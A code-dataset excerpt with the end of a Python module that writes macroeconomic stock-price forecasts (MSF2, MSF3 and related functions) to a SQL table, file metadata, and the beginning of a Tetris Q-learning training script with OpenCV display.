                macroPercentChange['statistics'].iloc[i] = macrov * 100
            # Average macro percent change over n points, as a fraction
            S = DataForecast.calc(self, macroPercentChange, SP, n)
            # temp_price holds the previous forecast price for the next prediction
            temp_price = 0
            # The first forecast compounds on the most recent close; every later
            # forecast compounds on the previous forecast price.
            # NOTE(fix): the original branched on `x in [2, 3, 4]` here, but both
            # branches were byte-identical, so the dead check was removed.
            isFirst = True
            for i in range(n):
                if isFirst:
                    temp_price = (S * SP['close'].iloc[n - 1]) + SP['close'].iloc[n - 1]
                    isFirst = False
                else:
                    temp_price = (S * temp_price) + temp_price
                # Once the forecast price is calculated append it to median_forecast
                median_forecast[date[i]].append(temp_price)
        # Median forecast price across all macro variables for each date
        forecast_prices = []
        for i in date:
            sorted_prices = sorted(median_forecast[i])
            center = len(sorted_prices) // 2
            # NOTE(fix): the even/odd branches were swapped in the original code;
            # an even-length list now averages the two middle values and an
            # odd-length list takes the single middle value.
            if len(sorted_prices) % 2 == 0:
                forecast_prices.append((sorted_prices[center] + sorted_prices[center - 1]) / 2)
            else:
                forecast_prices.append(sorted_prices[center])
        # Rows match the macroeconalgorithm table structure
        for i in range(len(forecast_prices)):
            data.append([date[i], v, 'ALL', forecast_prices[i], 'MSF1', 0])
    # Convert data list to dataframe and replace the forecast table
    table = pd.DataFrame(data, columns=['forecastdate', 'instrumentid', 'macroeconcode',
                                        'forecastprice', 'algorithmcode', 'prederror'])
    table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists='replace',
                 index=False)
def MSF2(self):
    """
    Macro Statistical Forecast 2.

    Forecast quarterly prices per instrument from weighted percent changes of
    GDP, Unemployment Rate, Inflation Rate and Misery Index, and APPEND the
    results (algorithmcode 'MSF2') to dbo_macroeconalgorithmforecast.

    Side effects: reads dbo_* tables and writes forecasts via self.engine;
    calls FinsterTab.W2020.AccuracyTest.create_weightings_MSF2.
    """
    # If you want to use set weightings, set this true. Otherwise set it false
    # If you set it to true then the weightings can be altered for MSF2 in AccuracyTest.py on line 647 in create_weightings_MSF2
    # Using set weightings will significantly speed up the run time of the application
    setWeightings = True
    # Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
    query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
    data = pd.read_sql_query(query, self.engine)
    # Query to grab the instrumentid and instrument name from the instrumentmaster database table
    query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster'
    data1 = pd.read_sql_query(query, self.engine)
    # keys maps each macro econ name -> its macro econ code
    keys = {}
    for i in range(len(data)):
        keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
    # ikeys maps each instrument name -> its instrument id
    ikeys = {}
    for x in range(len(data1)):
        ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
    # vars maps macro econ NAME -> list of percent changes
    # (NOTE: `vars` shadows the builtin; name kept to match the rest of the file)
    vars = {}
    for i in data['macroeconname']:
        # Vars is only populated with the relevant macro economic variables (GDP, UR, IR, and MI)
        if(i == 'GDP' or i == 'Unemployment Rate' or i == 'Inflation Rate' or i == 'Misery Index'):
            d = {i: []}
            vars.update(d)
    # result maps instrument ID -> list of n-quarter forecast-price lists
    result = {}
    for i in data1['instrumentid']:
        d = {i: []}
        result.update(d)
    # Weightings are determined through a function written in accuracytest.py
    # The weightings returned are used in the calculation below
    weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF2(self.engine, setWeightings)
    # Number of quarterly datapoints (history depth and forecast horizon)
    n = 8

    # Getting Dates for Future Forecast #
    # --------------------------------------------------------------------------------------------------------------#
    # Initialize the currentDate variable for use when grabbing the forecasted dates
    currentDate = datetime.today()
    # Creates a list to store future forecast dates
    date = []
    # Seed `count` with the current quarter so no past forecast dates enter the list
    if (currentDate.month < 4):
        count = 0
    elif (currentDate.month < 7 and currentDate.month >= 4):
        count = 1
    elif (currentDate.month < 10 and currentDate.month >= 7):
        count = 2
    else:
        count = 3
    # Initialize a variable to the current year
    year = currentDate.year
    # Append one quarter-end date per datapoint, rolling the year after Q4
    for i in range(n):
        # If the count is 0 then we are still in the first quarter
        if (count == 0):
            date.append(str(year) + "-03-" + "31")
            # Increase count so this date is not repeated for this year
            count += 1
        # Do the same for the next quarter
        elif (count == 1):
            date.append(str(year) + "-06-" + "30")
            count += 1
        # And for the next quarter
        elif (count == 2):
            date.append(str(year) + "-09-" + "30")
            count += 1
        # Until we account for the last quarter of the year
        else:
            date.append(str(year) + "-12-" + "31")
            # Where we then reinitialize count to 0
            count = 0
            # And then increment the year for the next iterations
            year = year + 1
    # --------------------------------------------------------------------------------------------------------------#
    # reinitializes currentDate to today's date, quoted so it can be read by MySQL
    currentDate = str(datetime.today())
    currentDate = ("'" + currentDate + "'")
    # Calculate the percent change of each relevant macroeconomic variable
    for i in keys:
        # Check to make sure the macroecon name we are working with is one of the relevant ones
        if i in vars:
            # Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
            query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + keys[i] + '"')
            data = pd.read_sql_query(query, self.engine)
            # For loop to retrieve macro statistics and calculate percent change
            for j in range(n):
                # This will grab the n+1 statistic to use to calculate the percent change to the n statistic
                # NOTE(review): these two tail() calls are re-executed every j;
                # idempotent after the first pass, just redundant work.
                temp = data.tail(n + 1)
                # This will grab the most recent n statistics from the query, as we are working only with n points
                data = data.tail(n)
                # For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
                if j == 0:
                    macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
                    vars[i].append(macrov)
                else:
                    macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
                             data['statistics'].iloc[j - 1]
                    vars[i].append(macrov)
    # We now iterate through the instrument ids
    for x in ikeys:
        # Last close of each quarter-end month from 2014 to now
        query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
                "(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
                "dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
                "WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
                "MONTH(z.date) = 12)".format(ikeys[x], currentDate)
        # Execute the query and keep only the last n stats, as we use n datapoints
        instrumentStats = pd.read_sql_query(query, self.engine)
        instrumentStats = instrumentStats.tail(n)
        # temp_result stores the resulting forecast prices for the n datapoints
        temp_result = []
        # isFirst: the first forecast compounds on the most recent close;
        # every later forecast compounds on the previous forecast price
        isFirst = True
        # This for loop is where the actual calculation takes place
        for i in range(n):
            if isFirst:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] * weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
                stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
                temp_result.append(stat)
                temp_price = stat
                isFirst = False
            else:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] *
                       weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
                stat = (stat * temp_price) + temp_price
                temp_result.append(stat)
                temp_price = stat
        # Append the n forecasted prices for this instrument to result
        result[ikeys[x]].append(temp_result)
    # table: rows matching the macroeconalgorithmforecast table columns
    table = []
    # Populate table[] with the correct values according to the database structure
    for i, k in result.items():
        cnt = 0
        for j in k:
            for l in range(n):
                table.append([date[cnt], i, 'ALL', j[cnt], 'MSF2', 0])
                cnt += 1
    # Once table is populated we then push it into the macroeconalgorithmforecast table
    table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
                                         'forecastprice', 'algorithmcode', 'prederror'])
    table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
def MSF3(self):
    """
    Macro Statistical Forecast 3.

    Forecast quarterly prices per instrument from weighted percent changes of
    the GDP, COVI, CPIUC and FSI macroeconomic variables, and APPEND the
    results (algorithmcode 'MSF3') to dbo_macroeconalgorithmforecast.

    Side effects: reads dbo_* tables and writes forecasts via self.engine;
    calls FinsterTab.W2020.AccuracyTest.create_weightings_MSF3.
    """
    # If you want to use set weightings, set this true. Otherwise set it false
    # If you set it to true then the weightings can be altered for MSF3 in AccuracyTest.py on line 1064 in create_weightings_MSF3
    # Using set weightings will significantly speed up the run time of the application
    setWeightings = True
    # Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
    query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
    data = pd.read_sql_query(query, self.engine)
    # Query to grab the instrumentid and instrument name from the instrumentmaster database table
    query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster'
    data1 = pd.read_sql_query(query, self.engine)
    # keys maps each macro econ name -> its macro econ code
    keys = {}
    for i in range(len(data)):
        keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
    # ikeys maps each instrument name -> its instrument id
    ikeys = {}
    for x in range(len(data1)):
        ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
    # vars maps macro econ CODE -> list of percent changes (unlike MSF2, which
    # keys by name). NOTE: `vars` shadows the builtin; name kept as-is.
    vars = {}
    for i in data['macroeconcode']:
        # Vars is only populated with the relevant macro economic variables (GDP, COVI, CPIUC, and FSI)
        if(i == 'GDP' or i == 'COVI' or i == 'CPIUC' or i == 'FSI'):
            d = {i: []}
            vars.update(d)
    # result maps instrument ID -> list of n-quarter forecast-price lists
    result = {}
    for i in data1['instrumentid']:
        d = {i: []}
        result.update(d)
    # Weightings are determined through a function written in accuracytest.py
    # The weightings returned are used in the calculation below
    weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF3(self.engine, setWeightings)
    # Number of quarterly datapoints (history depth and forecast horizon)
    n = 8

    # Getting Dates for Future Forecast #
    # --------------------------------------------------------------------------------------------------------------#
    # Initialize the currentDate variable for use when grabbing the forecasted dates
    currentDate = datetime.today()
    # Creates a list to store future forecast dates
    date = []
    # Seed `count` with the current quarter so no past forecast dates enter the list
    if (currentDate.month < 4):
        count = 0
    elif (currentDate.month < 7 and currentDate.month >= 4):
        count = 1
    elif (currentDate.month < 10 and currentDate.month >= 7):
        count = 2
    else:
        count = 3
    # Initialize a variable to the current year
    year = currentDate.year
    # Append one quarter-end date per datapoint, rolling the year after Q4
    for i in range(n):
        # If the count is 0 then we are still in the first quarter
        if (count == 0):
            date.append(str(year) + "-03-" + "31")
            # Increase count so this date is not repeated for this year
            count += 1
        # Do the same for the next quarter
        elif (count == 1):
            date.append(str(year) + "-06-" + "30")
            count += 1
        # And for the next quarter
        elif (count == 2):
            date.append(str(year) + "-09-" + "30")
            count += 1
        # Until we account for the last quarter of the year
        else:
            date.append(str(year) + "-12-" + "31")
            # Where we then reinitialize count to 0
            count = 0
            # And then increment the year for the next iterations
            year = year + 1
    # --------------------------------------------------------------------------------------------------------------#
    # reinitializes currentDate to today's date, quoted so it can be read by MySQL
    currentDate = str(datetime.today())
    currentDate = ("'" + currentDate + "'")
    # Calculate the percent change of each relevant macroeconomic variable
    for i in keys:
        # Check to make sure the macroeconcode we are working with is one of the relevant ones
        if keys[i] in vars:
            # Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
            query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format(
                '"' + keys[i] + '"')
            data = pd.read_sql_query(query, self.engine)
            # For loop to retrieve macro statistics and calculate percent change
            for j in range(n):
                # This will grab the n+1 statistic to use to calculate the percent change to the n statistic
                # NOTE(review): these two tail() calls are re-executed every j;
                # idempotent after the first pass, just redundant work.
                temp = data.tail(n + 1)
                # This will grab the most recent n statistics from the query, as we are working only with n points
                data = data.tail(n)
                # For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
                if j == 0:
                    macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
                    vars[keys[i]].append(macrov)
                else:
                    macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
                             data['statistics'].iloc[j - 1]
                    vars[keys[i]].append(macrov)
    # We now iterate through the instrument ids
    for x in ikeys:
        # Last close of each quarter-end month from 2014 to now
        query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
                "(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
                "dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
                "WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
                "MONTH(z.date) = 12)".format(ikeys[x], currentDate)
        # Execute the query and keep only the last n stats, as we use n datapoints
        instrumentStats = pd.read_sql_query(query, self.engine)
        instrumentStats = instrumentStats.tail(n)
        # temp_result stores the resulting forecast prices for the n datapoints
        temp_result = []
        # isFirst: the first forecast compounds on the most recent close;
        # every later forecast compounds on the previous forecast price
        isFirst = True
        # This for loop is where the actual calculation takes place
        for i in range(n):
            if isFirst:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['COVI'][i] * weightings[ikeys[x]][1] + vars['FSI'][i] * weightings[ikeys[x]][2]) - \
                       (vars['CPIUC'][i] * vars['CPIUC'][i])
                stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
                temp_result.append(stat)
                temp_price = stat
                isFirst = False
            else:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['COVI'][i] * weightings[ikeys[x]][1] + vars['FSI'][i] * weightings[ikeys[x]][2]) - \
                       (vars['CPIUC'][i] * vars['CPIUC'][i])
                stat = (stat * temp_price) + temp_price
                temp_result.append(stat)
                temp_price = stat
        # Append the n forecasted prices for this instrument to result
        result[ikeys[x]].append(temp_result)
    # table: rows matching the macroeconalgorithmforecast table columns
    table = []
    # Populate table[] with the correct values according to the database structure
    for i, k in result.items():
        cnt = 0
        for j in k:
            for l in range(n):
                table.append([date[cnt], i, 'ALL', j[cnt], 'MSF3', 0])
                cnt += 1
    # Once table is populated we then push it into the macroeconalgorithmforecast table
    table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
                                         'forecastprice', 'algorithmcode', 'prederror'])
    table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
def MSF2_Past_Date(self):
    """
    MSF2 variant restricted to a single instrument, using past-date weightings.

    Forecasts quarterly prices for instrumentid 3 only (hard-coded in both the
    instrument query and the statistics query below) from weighted percent
    changes of GDP, Unemployment Rate, Inflation Rate and Misery Index, and
    APPENDS the results (algorithmcode 'MSF2 Past Dates') to
    dbo_macroeconalgorithmforecast.

    Side effects: reads dbo_* tables and writes forecasts via self.engine;
    calls FinsterTab.W2020.AccuracyTest.create_weightings_MSF2_Past_Dates.
    """
    # Query to grab the macroeconcodes and macroeconnames from the macroeconmaster database table
    query = "SELECT macroeconcode, macroeconname FROM dbo_macroeconmaster WHERE activecode = 'A'"
    data = pd.read_sql_query(query, self.engine)
    # Query to grab the instrumentid and instrument name from the instrumentmaster database table
    # (restricted to instrumentid 3 — this method only processes that instrument)
    query = 'SELECT instrumentid, instrumentname FROM dbo_instrumentmaster WHERE instrumentid = 3'
    data1 = pd.read_sql_query(query, self.engine)
    # keys maps each macro econ name -> its macro econ code
    keys = {}
    for i in range(len(data)):
        keys.update({data['macroeconname'].iloc[i]: data['macroeconcode'].iloc[i]})
    # ikeys maps each instrument name -> its instrument id
    ikeys = {}
    for x in range(len(data1)):
        ikeys.update({data1['instrumentname'].iloc[x]: data1['instrumentid'].iloc[x]})
    # vars maps macro econ NAME -> list of percent changes
    # (NOTE: `vars` shadows the builtin; name kept to match the rest of the file)
    vars = {}
    for i in data['macroeconname']:
        # Vars is only populated with the relevant macro economic variables (GDP, UR, IR, and MI)
        if(i == 'GDP' or i == 'Unemployment Rate' or i == 'Inflation Rate' or i == 'Misery Index'):
            d = {i: []}
            vars.update(d)
    # result maps instrument ID -> list of n-quarter forecast-price lists
    result = {}
    for i in data1['instrumentid']:
        d = {i: []}
        result.update(d)
    # Weightings are determined through a function written in accuracytest.py
    # The weightings returned are used in the calculation below
    weightings = FinsterTab.W2020.AccuracyTest.create_weightings_MSF2_Past_Dates(self.engine)
    # Number of quarterly datapoints (history depth and forecast horizon)
    n = 8

    # Getting Dates for Future Forecast #
    # --------------------------------------------------------------------------------------------------------------#
    # Initialize the currentDate variable for use when grabbing the forecasted dates
    currentDate = datetime.today()
    # Creates a list to store future forecast dates
    date = []
    # Seed `count` with the current quarter so no past forecast dates enter the list
    if (currentDate.month < 4):
        count = 0
    elif (currentDate.month < 7 and currentDate.month >= 4):
        count = 1
    elif (currentDate.month < 10 and currentDate.month >= 7):
        count = 2
    else:
        count = 3
    # Initialize a variable to the current year
    year = currentDate.year
    # Append one quarter-end date per datapoint, rolling the year after Q4
    for i in range(n):
        # If the count is 0 then we are still in the first quarter
        if (count == 0):
            date.append(str(year) + "-03-" + "31")
            # Increase count so this date is not repeated for this year
            count += 1
        # Do the same for the next quarter
        elif (count == 1):
            date.append(str(year) + "-06-" + "30")
            count += 1
        # And for the next quarter
        elif (count == 2):
            date.append(str(year) + "-09-" + "30")
            count += 1
        # Until we account for the last quarter of the year
        else:
            date.append(str(year) + "-12-" + "31")
            # Where we then reinitialize count to 0
            count = 0
            # And then increment the year for the next iterations
            year = year + 1
    # --------------------------------------------------------------------------------------------------------------#
    # reinitializes currentDate to today's date, quoted so it can be read by MySQL
    currentDate = str(datetime.today())
    currentDate = ("'" + currentDate + "'")
    # Calculate the percent change of each relevant macroeconomic variable
    for i in keys:
        # Check to make sure the macroecon name we are working with is one of the relevant ones
        if i in vars:
            # Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
            query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + keys[i] + '"')
            data = pd.read_sql_query(query, self.engine)
            # For loop to retrieve macro statistics and calculate percent change
            for j in range(n):
                # This will grab the n+1 statistic to use to calculate the percent change to the n statistic
                # NOTE(review): these two tail() calls are re-executed every j;
                # idempotent after the first pass, just redundant work.
                temp = data.tail(n + 1)
                # This will grab the most recent n statistics from the query, as we are working only with n points
                data = data.tail(n)
                # For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
                if j == 0:
                    macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
                    vars[i].append(macrov)
                else:
                    macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
                             data['statistics'].iloc[j - 1]
                    vars[i].append(macrov)
    # We now iterate through the instrument ids
    for x in ikeys:
        # Last close of each quarter-end month from 2014 to now
        # (instrumentid hard-coded to 3, matching the data1 query above)
        query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
                "(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
                "dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
                "WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
                "MONTH(z.date) = 12)".format(3, currentDate)
        # Execute the query and keep only the last n stats, as we use n datapoints
        instrumentStats = pd.read_sql_query(query, self.engine)
        instrumentStats = instrumentStats.tail(n)
        # temp_result stores the resulting forecast prices for the n datapoints
        temp_result = []
        # isFirst: the first forecast compounds on the most recent close;
        # every later forecast compounds on the previous forecast price
        isFirst = True
        # This for loop is where the actual calculation takes place
        for i in range(n):
            if isFirst:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] * weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
                stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
                temp_result.append(stat)
                temp_price = stat
                isFirst = False
            else:
                stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] *
                       weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
                stat = (stat * temp_price) + temp_price
                temp_result.append(stat)
                temp_price = stat
        # Append the n forecasted prices for this instrument to result
        result[ikeys[x]].append(temp_result)
    # table: rows matching the macroeconalgorithmforecast table columns
    table = []
    # Populate table[] with the correct values according to the database structure
    for i, k in result.items():
        cnt = 0
        for j in k:
            for l in range(n):
                table.append([date[cnt], i, 'ALL', j[cnt], 'MSF2 Past Dates', 0])
                cnt += 1
    # Once table is populated we then push it into the macroeconalgorithmforecast table
    table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
                                         'forecastprice', 'algorithmcode', 'prederror'])
    table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
# Calculation function used in MSF1
def calc(self, df1, df2, n):
    """Return the average macro-variable percentage change over the first
    *n* data points of ``df1``, converted from a percent to a fraction.

    df1 -- frame-like object exposing a ``'statistics'`` column/sequence
    df2 -- accepted for interface compatibility; not used here
    n   -- number of leading data points to average
    """
    mean_change = sum(df1['statistics'][i] for i in range(n)) / n
    # The statistics are percentages; scale down to a fraction.
    return mean_change / 100
# END CODE MODULE
| 51.762414
| 234
| 0.57503
| 9,699
| 82,354
| 4.798948
| 0.068976
| 0.02041
| 0.009668
| 0.015039
| 0.849221
| 0.830895
| 0.817703
| 0.803115
| 0.801568
| 0.790848
| 0
| 0.01405
| 0.330221
| 82,354
| 1,591
| 235
| 51.762414
| 0.829783
| 0.292238
| 0
| 0.772222
| 0
| 0.01
| 0.183004
| 0.022424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014444
| false
| 0
| 0.018889
| 0
| 0.035556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
822b4480fa64608eb6e4ce27156b3eb30481ac3a
| 15,690
|
py
|
Python
|
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
"""
此脚本是为了检验train_q_function2.py总结的原因
总结原因:
4x10 仅有L型俄罗斯方块,的的确确存在数种无限循环,但每次所有方块都消除完后,
总会回归到那个初始状态,但消除行数的reward机制会促使避开无限循环
"""
import numpy as np
import cv2
from utils.util import create_image_from_state
from game.confs import Action_Type, Block_Type
from game.tetris_engine import tetris_engine
# Log of the actions taken during visual_train(); printed and cleared on
# every hard drop (space key).
action_list = []
# Initial Q-value assigned to every unseen (state, action) pair.
state_init_value = -10000.0
def sample():
    """Replay two hard-coded action sequences against the Tetris engine.

    Feeds the engine from ``act_list`` or ``act_list_not_finite`` (switching
    between them each time the current list is exhausted, based on the parity
    of ``itr_count``), performs tabular Q-learning updates along the way and
    renders every frame with OpenCV.  Keys: q/ESC quit, i prints the
    iteration count and the Q table.

    Action codes used in the lists: 0 = left ('a'), 1 = right ('d'),
    2 = rotate ('w'), 3 = down ('s').
    """
    # Sequence that loops back to the initial board state.
    act_list = [
        1, 1, 3, 3, 3, 2, 2, 1, 1, 1, 3, 3, 0, 0, 0, 0, 3, 2, 2, 0,
        0, 0, 3, 3, 2, 3, 3, 3, 3, 2, 2, 2, 3, 3, 3, 3, 1, 1, 3, 3,
        3, 2, 2, 1, 1, 1, 3, 3, 0, 0, 0, 0, 3, 2, 2, 0, 0, 0, 3, 3,
    ]
    # Sequence that does not settle into the finite loop.
    act_list_not_finite = [
        0, 0, 0, 0, 3, 0, 3, 3, 3, 3, 1, 1, 3, 3, 3, 2, 2, 1, 1, 1,
        3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 1, 1, 3, 3, 2, 2, 1, 1, 1, 3,
        0, 0, 2, 0, 3, 3, 3, 1, 1,
    ]
    lr = 0.8      # learning rate
    gamma = 0.95  # discount factor
    qtable = {}   # hex state key -> list of per-action Q values
    env = tetris_engine([Block_Type.L])
    game_state = env.reset()
    debug_img = None
    is_end = False
    tmplist = act_list.copy()
    itr_count = 0
    while True:
        img = create_image_from_state(game_state)
        # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        cv2.imshow("frame", img)
        if debug_img is not None:
            cv2.imshow("debug", debug_img)
        if len(tmplist) <= 0:
            # Current script exhausted: alternate between the two sequences.
            itr_count += 1
            if itr_count % 2 == 0:
                tmplist = act_list.copy()
            else:
                tmplist = act_list_not_finite.copy()
        key = cv2.waitKey(1)
        # press Q or ESC
        if key == ord("q") or key == 27:
            break
        if key != ord("i"):
            # Replace the (usually absent) keypress with the next scripted
            # action, mapped onto the manual control keys.
            tmpkey = tmplist.pop(0)
            if tmpkey == 0:
                key = ord("a")
            elif tmpkey == 1:
                key = ord("d")
            elif tmpkey == 2:
                key = ord("w")
            elif tmpkey == 3:
                key = ord("s")
            else:
                raise Exception("Key Error ...")
        if is_end:
            # Episode over: reset the engine and restart the scripted input.
            env = tetris_engine([Block_Type.L])
            game_state = env.reset()
            debug_img = None
            is_end = False
            if itr_count % 2 == 0:
                tmplist = act_list.copy()
            else:
                tmplist = act_list_not_finite.copy()
            continue
        game_state_key = game_state.tobytes().hex()
        if game_state_key not in qtable:
            qtable[game_state_key] = [state_init_value] * env.action_space
        if key == ord("w"):
            # rotate (action index 2)
            new_state, reward, is_end, debug = env.step(Action_Type.Rotate)
            new_state_key = new_state.tobytes().hex()
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                qtable[game_state_key][2] = qtable[game_state_key][2] + lr * (
                    reward
                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][2]
                )
            # print(np.array(list(qtable.values())))
            game_state = new_state
        elif key == ord("s"):
            # down (action index 3)
            new_state, reward, is_end, debug = env.step(Action_Type.Down)
            new_state_key = new_state.tobytes().hex()
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if is_end:
                # A Down that ends the game gets a fixed penalty.
                qtable[game_state_key][3] = -100
            else:
                if new_state_key not in qtable:
                    qtable[new_state_key] = [state_init_value] * env.action_space
                # For moves that leave the state unchanged, skipping the
                # Q-value update makes the resulting Q table more robust.
                if new_state_key != game_state_key:
                    qtable[game_state_key][3] = qtable[game_state_key][3] + lr * (
                        reward
                        + gamma * np.amax(qtable[new_state_key])
                        - qtable[game_state_key][3]
                    )
            # print(np.array(list(qtable.values())))
            game_state = new_state
        elif key == ord("a"):
            # left (action index 0)
            new_state, reward, is_end, debug = env.step(Action_Type.Left_Down)
            new_state_key = new_state.tobytes().hex()
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                qtable[game_state_key][0] = qtable[game_state_key][0] + lr * (
                    reward
                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][0]
                )
            # print(np.array(list(qtable.values())))
            game_state = new_state
        elif key == ord("d"):
            # right (action index 1)
            new_state, reward, is_end, debug = env.step(Action_Type.Right_Down)
            new_state_key = new_state.tobytes().hex()
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                qtable[game_state_key][1] = qtable[game_state_key][1] + lr * (
                    reward
